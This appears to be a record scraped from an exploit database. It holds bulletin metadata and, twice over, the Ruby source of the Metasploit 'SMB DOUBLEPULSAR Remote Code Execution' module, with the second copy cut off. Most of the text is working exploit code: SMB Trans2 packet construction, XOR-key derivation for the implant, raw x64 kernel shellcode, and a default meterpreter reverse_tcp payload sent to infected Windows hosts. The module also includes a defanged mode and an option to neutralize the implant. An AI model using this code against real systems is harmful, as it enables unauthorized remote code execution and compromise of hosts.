@arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-02T22:16:00", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ebed9644652d0880017db5969813fd72", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T06:21:04", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-04T06:21:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T06:21:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n 